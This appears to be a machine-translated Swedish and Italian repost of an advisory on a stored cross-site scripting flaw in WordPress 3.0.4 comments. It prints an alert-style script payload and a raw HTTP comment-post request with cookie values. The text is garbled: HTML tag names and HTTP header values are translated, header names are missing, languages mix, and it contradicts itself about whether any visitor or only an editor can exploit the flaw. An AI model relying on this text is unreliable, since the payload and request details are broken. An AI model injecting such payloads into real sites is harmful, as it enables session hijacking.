WordPress 3.0.4 presenterar en Lagrade XSS sårbarheter.
La grave vulnerabilità permette ad un qualsiasi visitatore di commentare un post inserendo all’interno del codice malevolo.
Lösningen: Inaktivera möjlighet att kommentera inlägg
### Sårbar produkt ###
+ WordPress: "WordPress är web program du kan använda för att skapa en vacker webbplats eller blogg.
Vi vill säga att WordPress är både gratis och ovärderliga på samma gång."
+ Hemsida: http://wordpress.org
### SÅRBARHET DETALJER ###
+ Beskrivning: Angripare kan utföra skadliga javascript koder eller kapning session för eskalering av behörigheter.
Angriparen måste vara den myndighet i editorn.
Skärmdump: http://img3.imageshack.us/img3/1148/wordpressx.png~~V: ""--></stil></skript><skript>alert('XSS')</skript>
POST http://localhost/wordpress304/wp-comments-post.php HTTP/1.1: localhost: keep-alive: http://localhost/wordpress304 /?page_id = 2: 189
Cache-Control: max-ålder = 0: http://localhost: application / x-www-form-urlencoded: application / xml,application / xhtml xml,text / html;q = 0,9, text / plain;q = 0,8, image / png,*/*;q = 0,5: Mozilla/5.0 (Windows; U; Windows NT 6.1; sv-SE) AppleWebKit/534.10 (KHTML, liknande Gecko)
Chrome/8.0.552.224 Safari/534.10: gzip,tömma,SDCH: tr-TR,tr;q = 0,8, sv-SE;q = 0,6, i;q = 0,4: ISO-8859-9, UTF-8;q = 0,7, *;q = 0,3: wp-settings-time-1 = 1293719651; wordpress_test_cookie = WP Cookie Kontrollera;
wordpress_logged_in_a9710e337f5b83061184233e85654d2c editor =%; wp-settings-time-3 = 1293720285&submit = Post kommentar&comment_post_ID = 2
&comment_parent = 0&_wp_unfiltered_html_comment = 7741b495eb
The post XSS Lagrade sårbarhet – WordPress 3.0.4 !!! appeared first on .
